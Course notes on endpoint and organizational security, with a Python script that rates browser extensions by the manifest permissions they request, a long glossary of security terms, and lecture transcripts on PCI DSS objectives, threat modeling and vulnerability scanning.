Another class of software that you might want to have policies defined for are browser extensions or add-ons. Since a lot of workflows live exclusively within the web browser now, they represent a potential vector for malware that often gets overlooked. Extensions that require full access to websites visited can be risky, since the extension developer has the power to modify pages visited. Some extensions may even send user input to a remote server. This could potentially leak confidential information. Clearly defining classifications of risky extensions and add-ons will help protect your systems and provide guidance to your users.
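One concrete way to define such a classification is to derive it from what the extension asks for in its manifest. The script below is an added example, not part of the course material: it reads Chrome- and Firefox-style manifest.json files (Manifest V2 lists host match patterns under "permissions", Manifest V3 moves them to "host_permissions") and assigns a risk tier. The tier thresholds and the three sample manifests are constructed for this example and are assumptions, not a vendor's classification.

```python
"""Classify browser extensions by the permissions their manifest requests.

Added example; not part of the course material. Reads Chrome/Firefox-style
manifest.json (Manifest V2 keeps host patterns in "permissions", Manifest V3
moves them to "host_permissions") and assigns a risk tier for an extension
policy. Tier thresholds and the sample manifests are constructed assumptions.
"""
import json

# Match patterns that let an extension read and modify every page visited.
ALL_SITES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# API permissions that let an extension observe or exfiltrate user data.
HIGH_RISK_APIS = {"webRequest", "webRequestBlocking", "clipboardRead", "cookies",
                  "history", "tabCapture", "nativeMessaging", "debugger", "proxy"}
MEDIUM_RISK_APIS = {"tabs", "downloads", "bookmarks", "storage", "scripting", "webNavigation"}


def _is_host_pattern(p):
    return p == "<all_urls>" or "://" in p


def host_patterns(manifest):
    """Host match patterns from both manifest versions plus content scripts."""
    patterns = {p for p in manifest.get("permissions", []) + manifest.get("host_permissions", [])
                if _is_host_pattern(p)}
    for script in manifest.get("content_scripts", []):
        patterns.update(script.get("matches", []))
    return patterns


def api_permissions(manifest):
    """Non-host (API) permissions."""
    return {p for p in manifest.get("permissions", []) if not _is_host_pattern(p)}


def classify(manifest):
    """Return (tier, reasons) with tier one of 'high', 'medium', 'low'."""
    hosts = host_patterns(manifest)
    apis = api_permissions(manifest)
    reasons = []
    if hosts & ALL_SITES:
        reasons.append("can read and modify every site visited")
    if apis & HIGH_RISK_APIS:
        reasons.append("data-access APIs: " + ", ".join(sorted(apis & HIGH_RISK_APIS)))
    if reasons:
        return "high", reasons
    if hosts:
        reasons.append("site access limited to: " + ", ".join(sorted(hosts)))
    if apis & MEDIUM_RISK_APIS:
        reasons.append("browser APIs: " + ", ".join(sorted(apis & MEDIUM_RISK_APIS)))
    return ("medium" if reasons else "low"), reasons


def classify_json(text):
    """Classify a manifest.json given as text."""
    return classify(json.loads(text))


# Constructed sample manifests; not real extensions.
SAMPLES = {
    "coupon-helper": """{"manifest_version": 3, "name": "Coupon Helper", "version": "1.0",
        "permissions": ["storage", "webRequest", "cookies"],
        "host_permissions": ["<all_urls>"]}""",
    "ticket-widget": """{"manifest_version": 2, "name": "Ticket Widget", "version": "2.1",
        "permissions": ["storage", "https://tickets.corp.example/*"]}""",
    "dark-theme": """{"manifest_version": 3, "name": "Dark Theme", "version": "0.3"}""",
}


def demo():
    """Tier for each sample manifest."""
    return {name: classify_json(text)[0] for name, text in SAMPLES.items()}


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        tier, reasons = classify_json(text)
        print(f"{name}: {tier} {reasons}")
```

A "high" result is the case the transcript describes: full access to every page plus an API that can ship what it sees to a remote server. In a policy, "high" would mean blocked unless a business justification is approved, "medium" means review, and "low" can be allowed; the manifest only tells you what the extension may do, not what it does, so the review step still matters.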
But policies are usually not enough to arm users with the information they need to make informed choices. Their decisions can impact the security of your organization. That's where education and training come into play. We went over a lot of really dense information on security in these lessons. Take time to review some of the videos so that it really sinks in.

Module 5 Glossary
New terms and their definitions: Course 5 Week 5
Antivirus software: It monitors and analyzes things like new files being created or being
modified on the system in order to watch for any behavior that matches a known malware
signature

Application policies: Define the boundaries of what applications are permitted or not, and also
help educate folks on how to use software more securely

Attack surface: It's the sum of all the different attack vectors in a given system

Attack vector: Method or mechanism by which an attacker or malware gains access to a
network or system

Bastion hosts or networks: A server used to provide access to a private network from an
external network 

Binary whitelisting software: It's a list of known good and trusted software and only things
that are on the list are permitted to run

Defense in depth: The concept of having multiple overlapping systems of defense to protect
IT systems

File-based encryption: Protects the confidentiality of individual files (and their integrity, when
an authenticated encryption mode is used) rather than the whole drive

Full disk encryption (FDE): It is the practice of encrypting the entire drive in the system

Host-based firewalls: Protects individual hosts from being compromised when they're used
in untrusted and potentially malicious environments

Key escrow: Allows encryption key to be securely stored for later retrieval by an authorized
party

Normalization: It's the process of taking log data in different formats and converting it into a
standardized format that's consistent with a defined log structure

Platform key: In UEFI Secure Boot, the public key corresponding to the private key used to sign
the boot files; it is the platform owner's root of trust for the rest of the Secure Boot key hierarchy

Secure boot protocol: It uses public key cryptography to verify the signatures on the boot
loader and other boot components before they are allowed to run

Security information and event management systems (SIEMS): Form of centralized logging
for security administration purposes

Software signing certificate: Trust mechanism where a software vendor can
cryptographically sign binaries they distribute using a private key

Terms and their definitions from previous weeks

A

Access Control Entries: The individual access permissions per object that make up the ACL

Access Control List (ACL): It is a way of defining permissions or authorizations for objects

Accounting: Keeping records of what resources and services your users access or what they
did when they were using your systems

Activation threshold: Triggers a pre-configured action when it is reached and will typically
block the identified attack traffic for a specific amount of time

Advanced Encryption Standard (AES): The first and only public cipher that's approved for
use with top secret information by the United States National Security Agency

Adware: Software that displays advertisements and collects data
Analyzing logs: The practice of collecting logs from different network and sometimes client
devices on your network, then performing an automated analysis on them

Asymmetric encryption: Systems where different keys are used to encrypt and decrypt

Attack: An actual attempt at causing harm to a system

Auditing: It involves reviewing records to ensure that nothing is out of the ordinary

Authentication server (AS): In Kerberos, the server that handles the initial authentication
request, which includes the user ID of the authenticating user

Authentication: Proving that an entity is who it claims to be; also a crucial application for
cryptographic hash functions

Authorization: It pertains to describing what the user account has access to or doesn't have
access to

Availability: Means that the information we have is readily accessible to those people that
should have it

Backdoor: A way to get into a system if the other methods to get in a system aren't allowed,
it's a secret entryway for attackers

Baiting: An attack that happens through actual physical contact, enticing a victim to do
something

Bind: The LDAP operation by which clients authenticate to the directory server

Biometric authentication: Authentication that uses Biometric data

Block ciphers: The cipher takes data in, places that into a bucket or block of data that's a
fixed size, then encodes that entire block as one unit

Botnet: A collection of one or more Bots

Bots: Machines compromised by malware that are utilized to perform tasks centrally
controlled by an attacker

Brute force attacks: A common password attack which consists of just continuously trying
different combinations of characters and letters until one gets access

CA (Certificate authority): It's the entity that's responsible for storing, issuing, and signing
certificates. It's a crucial component of the PKI system

Caesar cipher: A substitution cipher, where you replace characters in the alphabet with
others, usually by shifting or rotating the alphabet by a set number of positions

CBC-MAC (Cipher block chaining message authentication codes): A mechanism for
building MACs using block ciphers

CCMP (Counter Mode with CBC-MAC Protocol): The WPA2 encryption protocol, a mode of
operation for block ciphers (AES in CCM mode) that allows for authenticated encryption

Central repository: It is needed to securely store and index keys and a certificate
management system of some sort makes managing access to storage certificates and
issuance of certificates easier

Certificate fingerprints: These are just hash digests of the whole certificate, and aren't
actually fields in the certificate itself, but are computed by clients when validating or
inspecting certificates

Certificate Revocation List (CRL): A means to distribute a list of certificates that are no
longer valid

Certificate Signature Algorithm: This field indicates what public key algorithm is used for
the public key and what hashing algorithm is used to sign the certificate

Certificate Signature Value: The digital signature data itself

Certificate-based authentication: It is the most secure option, but it requires more support
and management overhead since every client must have a certificate

CIA Triad: Confidentiality, integrity, and availability. Three key principles of a guiding model
for designing information security policies

Client certificates: They operate very similarly to server certificates but are presented by
clients and allow servers to authenticate and verify clients

CMACs (Cipher-based Message Authentication Codes): The process is similar to HMAC, but
instead of using a hashing function to produce a digest, a symmetric cipher with a shared
key is used to encrypt the message and the resulting output is used as the MAC

Code signing certificates: It is used for signing executable programs and allows users of these
signed applications to verify the signatures and ensure that the application was not tampered
with

Confidentiality: Keeping things hidden

Correlation analysis: The process of taking log data from different systems, and matching
events across the systems

Counter-based tokens: They use a secret seed value along with the secret counter value
that's incremented every time a one-time password is generated on the device

Cross-site scripting (XSS): A type of injection attack where the attacker can insert malicious
code and target the user of the service

Cryptanalysis: Looking for hidden messages or trying to decipher coded messages

Cryptographic hashing: It is distinctly different from encryption because cryptographic hash
functions should be one directional

Cryptography: The overarching discipline that covers the practice of coding and hiding
messages from third parties

Cryptology: The study of cryptography

Cryptosystem: A collection of algorithms for key generation and encryption and decryption
operations that comprise a cryptographic service

Data binding and sealing: It involves using the secret key to derive a unique key that's then
used for encryption of data

Directory Information Tree (DIT): The LDAP directory structure, where objects have one parent
and can have one or more children that belong to the parent object

Decryption: The reverse process from encryption; taking the garbled output and
transforming it back into the readable plain text

Denial-of-Service (DoS) attack: An attack that tries to prevent access to a service for
legitimate users by overwhelming the network or server

DES (Data Encryption Standard): One of the earliest encryption standards

Deterministic: It means that the same input value should always return the same hash value

DH (Diffie-Hellman): A popular key exchange algorithm, named for its co-inventors

Dictionary attack: A type of password attack that tries out words that are commonly used in
passwords, like password, monkey, football

Distinguished name (DN): A unique identifier for each entry in the directory

Distributed Denial-of-Service (DDoS) attack: A DoS attack using multiple systems

DNS Cache Poisoning Attack: It works by tricking a DNS server into accepting a fake DNS
record that will point you to a compromised DNS server

DSA (Digital Signature Algorithm): It is another example of an asymmetric cryptographic
system, though it's used for signing and verifying data rather than for encryption

Dynamic ARP inspection (DAI): A feature on enterprise switches that prevents ARP spoofing
and poisoning attacks by validating ARP packets against the DHCP snooping binding table

EAP-TLS: One of the more common and secure EAP methods; both the client and the server
authenticate with certificates

ECDH & ECDSA: Elliptic curve variants of Diffie-Hellman and DSA, respectively

Elliptic curve cryptography (ECC): A public key encryption system that uses the algebraic
structure of elliptic curves over finite fields to generate secure keys

Encapsulating security payload: It's a part of the IPsec suite of protocols, which
encapsulates IP packets, providing confidentiality, integrity, and authentication of the
packets

Encryption algorithm: The underlying logic or process that's used to convert the plaintext
into ciphertext

Encryption: The act of taking a message (plaintext), and applying an operation to it (cipher),
so that you receive a garbled, unreadable message as the output (ciphertext)

End-entity (leaf certificate): A certificate that has no authority as a CA

Entropy pool: A source of random data to help seed random number generators

Evil twin: The premise of an evil twin attack is for you to connect to a network that is
identical to yours but that is controlled by an attacker. Once connected to it, they will be able
to monitor your traffic

Exploit: Software that is used to take advantage of a security bug or vulnerability

Extensible authentication protocol (EAP) and EAP over LAN (EAPOL): A standard
authentication framework; EAPOL is its encapsulation on wired and wireless LANs, used by
802.1X

Fail2ban: A common open source flood guard protection tool

FIPS (Federal Information Processing Standards): Standards published by NIST for US federal
systems; DES was adopted as a FIPS standard for encrypting and securing government data

Flood guards: Provide protection against DoS or Denial of Service Attacks

Forward secrecy: This is a property of a cryptographic system so that even in the event that
the private key is compromised, the session keys are still safe

Four-Way Handshake: It is designed to allow an AP to confirm that the client has the correct
pairwise master key in a WPA-PSK setup without disclosing the PMK

Frequency analysis: The practice of studying the frequency with which letters appear in
ciphertext

Full disk encryption (FDE): It is the practice of encrypting the entire drive in the system

GTK (Group Temporal Key): A temporal key, which is actually used to encrypt the broadcast and
multicast data an access point sends to all of its clients

Hacker: Someone who attempts to break into or exploit a system

Half-open attacks: A way to refer to SYN floods

Hash collisions: Two different inputs mapping to the same output

Hashing (Hash function): A type of function or operation that takes in an arbitrary data input
and maps it to an output of a fixed size, called a hash or a digest

HMAC (Keyed-Hash Message Authentication Codes): It uses a cryptographic hash function
along with a secret key to generate a MAC

HTTPS: Hypertext Transfer Protocol Secure is a secure version of HTTP that ensures the
communication your web browser has with the website is secured through encryption

Hubs: Devices that serve as a central location through which data travels through; a quick
and dirty way of getting packets mirrored to your capture interface

I

Identification: The idea of describing an entity uniquely

Implicit deny: A network security concept where anything not explicitly permitted or allowed
should be denied

Injection attacks: A common security exploit that can occur in software development and
runs rampant on the web, where an attacker injects malicious code

Integrity: Means keeping our data accurate and untampered with

Intermediary (subordinate) CA: It means that the entity that this certificate was issued to
can now sign other certificates

Intrusion detection and intrusion prevention systems (IDS/IPS): Operate by monitoring
network traffic and analyzing it; an IDS alerts on suspicious traffic, while an IPS sits inline
and can also block it

IP source guard (IPSG): It can be enabled on enterprise switches along with DHCP snooping to
drop traffic whose source IP address does not match the DHCP binding for that port

IPsec (Internet Protocol security): A VPN protocol that was designed in conjunction with
IPv6

Issuer Name: This field contains information about the authority that signed the certificate

Kerberos: A network authentication protocol that uses tickets to allow entities to prove their
identity over potentially insecure channels to provide mutual authentication

Kerckhoffs's principle: A principle that states that a cryptosystem, or a collection of
algorithms for key generation and encryption and decryption operations that comprise a
cryptographic service, should remain secure, even if everything about the system is known
except for the key

Key length: It defines the maximum potential strength of the system

Key signing parties: Organized by people who are interested in establishing a web of trust,
and participants perform the same verification and signing

Key size: It is the total number of bits or data that comprises the encryption key

Key: A crucial component of a cipher, which introduces something unique into your cipher

Keylogger: A common type of spyware that's used to record every keystroke you make

L

L2TP (Layer 2 Tunneling Protocol): It is typically used to support VPNs

Lightweight Directory Access Protocol (LDAP): An open industry-standard protocol for
accessing and maintaining directory services; a lighter-weight alternative to the X.500
Directory Access Protocol (DAP)

Logic bomb: A type of malware that's intentionally installed and lies dormant until a specific
condition or time triggers it

Logs analysis systems: They are configured using user-defined rules to match interesting or
atypical log entries

MACs (Message Authentication Codes): A bit of information that allows authentication of a
received message, ensuring that the message came from the alleged sender and not a third
party masquerading as them

Malware: A type of malicious software that can be used to obtain your sensitive information
or delete or modify files

MD5: A popular and widely used hash function designed in the early 1990s as a cryptographic
hashing function; collisions are now practical, so it should not be used for signatures or integrity

Meddler in the middle (formerly known as Man in the Middle): An attack that places the
attacker in the middle of two hosts that think they're communicating directly with each other

MIC (Message Integrity Check): It is essentially a hash digest of the message in question

Monitor mode: It allows a wireless adapter to scan across channels to see all wireless traffic
being sent by APs and clients

Multifactor authentication (MFA): A system where users are authenticated by presenting
multiple pieces of information or objects

Network hardening: Is the process of securing a network by reducing its potential
vulnerabilities through configuration changes, and taking specific steps

Network separation (network segmentation): A good security principle for an IT support
specialist to implement. It permits more flexible management of the network, and provides
some security benefits. This is the concept of using VLANs to create virtual networks for
different device classes or types

Network software hardening: Includes things like firewalls, proxies, and VPNs

Network time protocol (NTP): A network protocol used to synchronize clocks over a network, for
example between a time-based authenticator token and the authentication server

NIST: National Institute of Standards and Technology

OAuth: An open standard that allows users to grant third-party websites and applications
access to their information without sharing account credentials

Counter mode (CTR): It turns a block cipher into a stream cipher by using a random seed value
(nonce) along with an incrementing counter to create a key stream to encrypt data with

One-time password (OTP) tokens: Another very common method for handling multifactor
authentication

One-time password (OTP): A short-lived token, typically a number that's entered along with
a username and password

OpenID: An open standard that allows participating sites known as Relying Parties to allow
authentication of users utilizing a third party authentication service

Organizational units (OUs): Folders that let us group related objects into units like people or
groups to distinguish between individual user accounts and groups that accounts can belong
to

Packet sniffing (packet capture): the process of intercepting network packets in their
entirety for analysis

Pairwise Transient Key (PTK): It is generated using the PMK, AP nonce, Client nonce, AP
MAC address, and Client MAC address

Password attacks: Utilize software like password crackers that try and guess your password

Password salt: Additional randomized data that's added into the hashing function to
generate the hash that's unique to the password and salt combination

PBKDF2 (Password Based Key Derivation Function 2): A key derivation function that applies a
salted hash to a password many times (iterations) to make brute-force and dictionary attacks slower

PGP (Pretty Good Privacy) encryption: An encryption application that allows
authentication of data along with privacy from third parties relying upon asymmetric
encryption to achieve this

Phishing attack: It usually occurs when a malicious email is sent to a victim disguised as
something legitimate

Physical tokens: They take a few different forms, such as a USB device with a secret token on
it, a standalone device which generates a token, or even a simple key used with a traditional
lock

WPS PIN authentication method: It uses PINs that are eight digits long, but the last digit is a
checksum that's computed from the first seven digits, which reduces the number of guesses an
attacker needs

Ping flood: It sends tons of ping packets to a system. If a computer can't keep up with this,
then it's prone to being overwhelmed and taken down

PKI system: A system that defines the creation, storage and distribution of digital certificates

Port mirroring: Allows the switch to take all packets from a specified port, port range, or the
entire VLAN and mirror the packets to a specified switch port

Post-fail analysis: Investigating how a compromise happened after the breach is detected

Pre-shared key: It's the Wi-Fi password you share with people when they come over and
want to use your wireless network

Promiscuous mode: A network adapter operating mode in which the adapter passes every frame
it receives up to the host for inspection, not only those addressed to its own MAC address

Proxy: Can be useful to protect client devices and their traffic. They also provide secure
remote access without using a VPN

Pseudo-random: Something that isn't truly random

Public key authentication: A key pair is generated by the user who wants to authenticate

Public key signatures: Digital signature generated by hashing the message and signing the
digest with the private key, so that anyone holding the public key can verify it

RA (Registration Authority): It is responsible for verifying the identities of any entities
requesting certificates to be signed and stored with the CA

Rainbow table attacks: An attack that trades computational power for disk space by
pre-computing the hashes and storing them in a table

Rainbow tables: A pre-computed table of password candidates and their
corresponding hashes, defeated by salting the password before hashing

Random numbers: A very important concept in encryption because it avoids some kind of
pattern that an adversary can discover through close observation and analysis of encrypted
messages over time

Ransomware: A type of attack that holds your data or system hostage until you pay some
sort of ransom

RC4 (Rivest Cipher 4): A symmetric stream cipher that gained widespread adoption because
of its simplicity and speed; now deprecated because of statistical biases in its key stream

Remote attestation: The idea of a system authenticating its software and hardware
configuration to a remote system

Remote Authentication Dial-in User Service (RADIUS): A protocol that provides AAA
services for users on a network

Reverse proxy: A service that might appear to be a single server to external clients, but
actually represents many servers living behind it

Risk mitigation: Understanding the risks your systems face, take measures to reduce those
risks, and monitor them

Risk: The possibility of suffering a loss in the event of an attack on the system

Rogue Access Point (AP) Attack: An access point that is installed on the network without the
network administrator's knowledge

Rogue DHCP server attack: An attacker can hand out DHCP leases with whatever
information they want by deploying a rogue DHCP server on your network, setting a gateway
address or DNS server, that's actually a machine within their control

Root certificate authority: They are self signed because they are the start of the chain of
trust, so there's no higher authority that can sign on their behalf

Rootkit: A collection of software or tools that gives an attacker administrator ("root") level
access to a system while hiding its own presence

RSA: One of the first practical asymmetric cryptography systems to be developed, named for
the initials of the three co-inventors: Ron Rivest, Adi Shamir and Leonard Adleman

S

Screen lock: A security feature that helps prevent unwanted access by creating an action you
have to do to gain entry

Secure channel: It is provided by IPsec, which provides confidentiality, integrity, and
authentication of data being passed

Secure element: It's a tamper resistant chip often embedded in the microprocessor or
integrated into the mainboard of a mobile device

Secure Shell (SSH): A secure network protocol that uses encryption to allow access to a
network service over unsecured networks

Security keys: Small embedded cryptoprocessors, that have secure storage of asymmetric
keys and additional slots to run embedded code

Security through obscurity: The principle that if no one knows what algorithm is being used
or general security practices, then one is safe from attackers

Self-signed certificate: This certificate has been signed by the same entity that issued the
certificate

Serial number: A unique identifier for their certificate assigned by the CA which allows the CA
to manage and identify individual certificates

Session hijacking (cookie hijacking): A common meddler in the middle attack in which the
attacker steals a user's session cookie and uses it to impersonate that user

Session key: The shared symmetric encryption key used in TLS sessions to encrypt data being
sent back and forth

SHA1: It is part of the secure hash algorithm suite of functions, designed by the NSA and
published in 1995; practical collisions were demonstrated in 2017 and it is deprecated for
signatures

Shannon's maxim: It states that the system should remain secure, even if your adversary
knows exactly what kind of encryption systems you're employing, as long as your keys remain
secure

Single Sign-on (SSO): An authentication concept that allows users to authenticate once to
be granted access to a lot of different services and applications

Social engineering: An attack method that relies heavily on interactions with humans instead
of computers

Spear phishing: Phishing that targets an individual or group - the fake emails may contain some
personal information like your name, or the names of friends or family

Spoofing: When a source is masquerading as something else

Spyware: The type of malware that's meant to spy on you

SQL Injection Attack: An injection attack in which untrusted input is placed into a SQL query,
letting the attacker read or modify the database behind a website, and so potentially
compromise the entire site

SSL 3.0: The last revision of SSL, deprecated in 2015 (RFC 7568)

SSL/TLS Client Certificate: Certificates that are bound to clients and are used to
authenticate the client to the server, allowing access control to a SSL/TLS service

SSL/TLS Server Certificate: A certificate that a web server presents to a client as part of the
initial secure setup of an SSL, TLS connection

StartTLS: It permits a client to communicate using LDAP v3 over TLS

Steganography: The practice of hiding information from observers, but not encoding it

Stream ciphers: They take a stream of input and encrypt it one character or one digit at a
time, outputting one encrypted character or digit at a time

Subject Public Key Info: These two subfields define the algorithm of the public key along
with the public key itself

Subject: This field contains identifying information about the entity the certificate was issued
to

Substitution cipher: An encryption mechanism that replaces parts of your plaintext with
ciphertext

Symmetric key algorithm: Encryption algorithms that use the same key to encrypt and
decrypt messages

SYN flood: A denial-of-service attack in which the server is bombarded with TCP SYN packets
whose handshakes are never completed, exhausting its table of half-open connections

TACACS+: It is a device access AAA system that manages who has access to your network
devices and what they do on them

Tailgating: Gaining access into a restricted area or building by following a real employee in

Tcpdump: It's a super popular, lightweight command-line based utility that you can use to
capture and analyze packets

Threat: The possibility of danger that could exploit a vulnerability

Ticket granting service (TGS): It decrypts the Ticket Granting Ticket using the Ticket
Granting Service secret key, which provides the Ticket Granting Service with the client Ticket
Granting Service session key

Time-based token (TOTP): A One-Time-Password that's rotated periodically

TKIP (Temporal Key Integrity Protocol): The encryption protocol introduced with WPA to
address the shortcomings of WEP security

TLS 1.2 with AES GCM: A specific mode of operation for the AES block cipher that
essentially turns it into a stream cipher

TLS 1.2: A widely deployed revision of TLS and the minimum version that should be accepted
today; it has since been superseded by TLS 1.3 (published in 2018), which is the recommended
version where available

TLS Handshake: A mechanism to initially establish a channel for an application to
communicate with a service

TPM (Trusted Platform Module): A dedicated cryptoprocessor, typically integrated into the
hardware of a computer

Transport mode: One of the two modes of operations supported by IPsec. When used, only
the payload of the IP packet is encrypted, leaving the IP headers untouched

Trojan: Malware that disguises itself as one thing but does something else

Trusted execution environment (TEE): It provides a full-blown isolated execution
environment that runs alongside the main OS

Tunnel mode: One of the two modes of operations supported by IPsec. When used, the entire
IP packet, header, payload, and all, is encrypted and encapsulated inside a new IP packet
with new headers

Tunnel: It is provided by L2TP, which permits the passing of unmodified packets from one
network to another

U2F (Universal 2nd Factor): It's a standard developed jointly by Google, Yubico and NXP
Semiconductors that incorporates a challenge-response mechanism, along with public key
cryptography to implement a more secure and more convenient second-factor
authentication solution

Unbind: It closes the connection to the LDAP server

Username and password authentication: Can be used in conjunction with certificate
authentication, providing additional layers of security

Validity: This field contains two subfields, Not Before and Not After, which define the period
during which the certificate is valid

Version: Which version of the X.509 standard the certificate adheres to

Viruses: The best known type of malware; code that attaches itself to other programs or files
and spreads when they are run or opened

VPN (Virtual Private Network): A secure method of connecting a device to a private
network over the internet

VPNs: Commonly used to provide secure remote access, and link two networks securely

Vulnerability: A flaw in the system that could be exploited to compromise the system

Web of trust: It is where individuals instead of certificate authorities sign other individuals'
public keys

WEP (Wired Equivalent Privacy): First security protocol introduced for Wi-Fi networks

Wireshark: It's another packet capture and analysis tool that you can use, but it's way more
powerful when it comes to application and packet analysis, compared to tcpdump

Worms: They are similar to viruses except that instead of having to attach themselves onto
something to spread, worms can live on their own and spread through channels like the
network

WPA (Wi-fi protected access): Designed as a short-term replacement that would be
compatible with older WEP-enabled hardware with a simple firmware update

WPA2 Enterprise: WPA2 that uses 802.1X authentication to control access to Wi-Fi networks

WPS (Wifi Protected Setup): It's a convenience feature designed to make it easier for clients
to join a WPA-PSK protected network. Its PIN method can be brute-forced in a matter of hours,
so it is usually recommended to disable WPS

X

X.509 standard: It is what defines the format of digital certificates, as well as a certificate
revocation list or CRL

XTACACS: It stands for Extended TACACS, which was a Cisco proprietary extension on top
of TACACS

802.1X with EAP-TLS: Offers arguably the best security available, assuming proper and
secure handling of the PKI aspects of it

802.1X: It is the IEEE standard for encapsulating EAP, or Extensible Authentication Protocol,
traffic over 802 networks

0-Day Vulnerability (Zero Day): A vulnerability that is not known to the software developer
or vendor, but is known to an attacker

If you're responsible for an organization of users, 
there's a delicate balance between 
security and user productivity. 
We've seen this balance in action when we dove 
into the different security tools and systems together. 
Before you start to design a security architecture, 
you need to define exactly what 
you'd like it to accomplish. 
This will depend on what 
your company thinks is most important. 
It will probably have a way it wants 
different data to be handled and stored. 
You also need to know if your company has 
any legal requirements when it comes to security. 
If your company handles credit card payments, 
then you have to follow the PCI DSS, 
or Payment Card Industry Data Security Standard, 
a contractual requirement of the card brands 
that local laws may also make mandatory. 
We'll take a closer look at PCI DSS, 
which is a great example of 
clearly defined security goals. 
PCI DSS is broken into six broad objectives, 
each with some requirements. 
The first objective is to build and 
maintain a secure network and systems. 
This includes the requirements to install and 
maintain a firewall configuration 
to protect cardholder data, 
and to not use vendor supplied 
defaults for system passwords 
and other security parameters. 
As you can tell, the requirements 
are related to the objective. 
The objective is the end goal 
for what we'd like to achieve. 
Requirements are the actions 
that can help achieve that goal. 
PCI DSS goes into 
more detailed actions for each requirement. 
It provides more specific guidance around 
what a firewall configuration should control. 
For example, a secure firewall configuration 
should restrict connections 
between untrusted networks and 
any systems in the cardholder data environment. 
That's a little generic, 
but it does give us some guidance 
on how to meet the requirements. 
The second objective category 
is to protect cardholder data. 
In this objective, the first requirement 
is to protect stored cardholder data. 
The second is to encrypt the transmission of 
cardholder data across open public networks. 
I want to call out again how the broad objective is to 
protect sensitive data that's 
stored in systems within our control. 
The requirements give us 
specific guidelines on how to get this done. 
The specifics of these requirements 
help clarify some of the points, 
like what constitutes an open network. 
They also recommend using 
strong cryptography and offer some examples. 
But not all requirements are technical in nature. 
Let's look at the requirement to protect 
stored cardholder data, for example. 
it has requirements for 
data retention policies to make sure 
that sensitive payment information 
isn't stored beyond the time it's required. 
Once payment is authorized, 
authentication data shouldn't be needed 
anymore and it should be securely deleted. 
This highlights the fact that 
good security defenses aren't just technical in nature. 
They are also procedural and policy-based. 
The third objective is to 
maintain a vulnerability management program. 
The first requirement is to protect all systems against 
malware and regularly update 
antivirus software or programs. 
The second is to develop and 
maintain secure systems and applications. 
You'll find more detailed implementation procedures 
within these requirements. 
They'll cover things like ensuring all systems have 
anti-virus software installed and 
making sure the software is kept up-to-date. 
They also require that scans are run 
regularly and logs are maintained. 
There are also requirements for 
ensuring systems and software are 
protected against known vulnerabilities by applying 
critical security patches within one 
month of their release. 
Use of third-party security 
vulnerability databases is also 
listed to help identify 
known vulnerabilities within managed systems. 
The fourth objective is to 
implement strong access control measures. 
This objective has three requirements. 
The first is to restrict access to 
cardholder data by business need to know. 
The second is to identify and 
authenticate access to system components. 
The third is to restrict 
physical access to cardholder data. 
This highlights the importance of 
good access control measures 
along with good data access policies. 
The first requirement, restricting 
access to data by business need to know, 
means that any sensitive data should be covered by 
data access policies to make 
sure that customer data isn't misused. 
Part of the second requirement, identifying and 
authenticating access, is to 
enforce password authentication for 
system access and 
two-factor authentication for remote access. 
That's the minimum requirement. 
Another important piece highlighted by 
the PCI DSS requirements 
is access control for physical access. 
This is a critical security aspect 
to keep in mind since we need to 
protect systems and data from 
both physical theft and virtual attacks. 
The fifth objective is to 
regularly monitor and test networks. 
The first requirement is to track and 
monitor all access to 
network resources and cardholder data. 
The second is to regularly 
test security systems and processes. 
The requirement for network monitoring and 
testing is another essential part 
of a good security plan. 
This refers to things like setting up and configuring 
intrusion detection systems and 
conducting vulnerability scans of the network, 
which we'll cover a bit more later. 
Testing defenses is another super important part of this. 
Just having the systems in place isn't enough. 
It's really helpful to test defense systems 
regularly to make sure that 
they provide the protection that you want. 
It also ensures that the alerting systems are functional. 
The sixth and final objective is to 
maintain an information security policy. 
It only has one requirement to maintain 
a policy that addresses 
information security for all personnel. 
This requirement addresses why we need to 
have well-established security policies. 
They help govern and regulate 
user behavior when it comes 
to information security aspects. 
It's important to call out that this requirement 
mentions that the policies should be for all personnel. 
The responsibility of information security 
isn't only on the security teams. 
Every member of an organization is 
responsible for information security. 
Well-designed security policies address 
the most common questions or use 
cases that users would have based 
on the specific details of the organization. 
Everyone that uses systems on 
your organization's network is 
able to get around security controls. 
They might not mean to, 
but they can reduce the overall security 
with their actions and practices. 
That's why well-thought-out security policies 
also need to be easy to find and easy to read.

Security is all about determining risks or exposure, 
understanding the likelihood of attacks, 
and designing defenses around 
these risks to minimize the impact of an attack. 
This thought process is actually something that everyone 
uses in their daily life whether they know it or not. 
Think of when you cross a busy intersection, 
you assess the probability of being hit by 
an oncoming car and minimize 
that risk by choosing the right time to cross the road. 
Security risk assessment starts with threat modeling. 
First, we identify likely threats to our systems, 
then we assign them priorities that 
correspond to severity and probability. 
We do this by brainstorming from 
the perspective of an outside attacker, 
putting ourselves in a hacker's shoes. 
It helps to start by figuring out 
what high-value targets an attacker may want to go after. 
From there, you can start to look at 
possible attack vectors that could be 
used to gain access to high-value assets. 
High-value data usually includes 
account information like usernames and passwords. 
Typically, any kind of 
user data is considered high-value, 
especially if payment processing is involved. 
Another part of risk measurement is understanding 
what vulnerabilities are on your systems and network. 
One way to find these out is to 
perform regular vulnerability scanning. 
There are lots of open-source and 
commercial solutions that you can use. 
They can be configured to perform 
scheduled automated scans of 
designated systems or networks 
to look for vulnerabilities, 
then they generate a report. 
Some of these tools are Nessus, 
OpenVAS, and Qualys. 
Let me break down what vulnerability scanners do. 
Heads-up. This might be a little dense, 
so feel free to go over it again. 
Vulnerability scanners are services 
that run on your system 
within your control that conduct 
periodic scans of configured networks. 
The service then conducts scans to 
find and discover hosts on the network. 
Once hosts are found, 
either through a ping sweep or port scanning, 
more detailed scans are run against discovered hosts. 
Scans upon scans upon scans. 
A port scan of 
either common ports or all possible valid ports is 
conducted against discovered hosts 
to determine what services are listening. 
These services are then probed 
to try to discover more info 
about the type of service and 
what version is listening on the relevant port. 
This information can then be checked 
against databases of known vulnerabilities. 
If a vulnerable version of a service is discovered, 
the scanner will add it to its report. 
Once the scan is finished, 
the discovered vulnerabilities and 
hosts are compiled in a report. 
That way an analyst can quickly and 
easily see where the problem areas are on the network. 
Found vulnerabilities are prioritized 
according to severity and other categorization. 
Severity takes into account a number of things 
like how likely the vulnerability is to be exploited. 
It also considers the type of 
access the vulnerability would provide to 
an attacker and whether or not it 
can be exploited remotely or not. 
Vulnerabilities in the report will have links 
to detailed, publicly disclosed information 
about the vulnerability. 
In some cases, it will also 
have recommendations on how to get rid of it. 
Vulnerability scanners will detect lots of things ranging 
from misconfigured services 
that represent potential risks, 
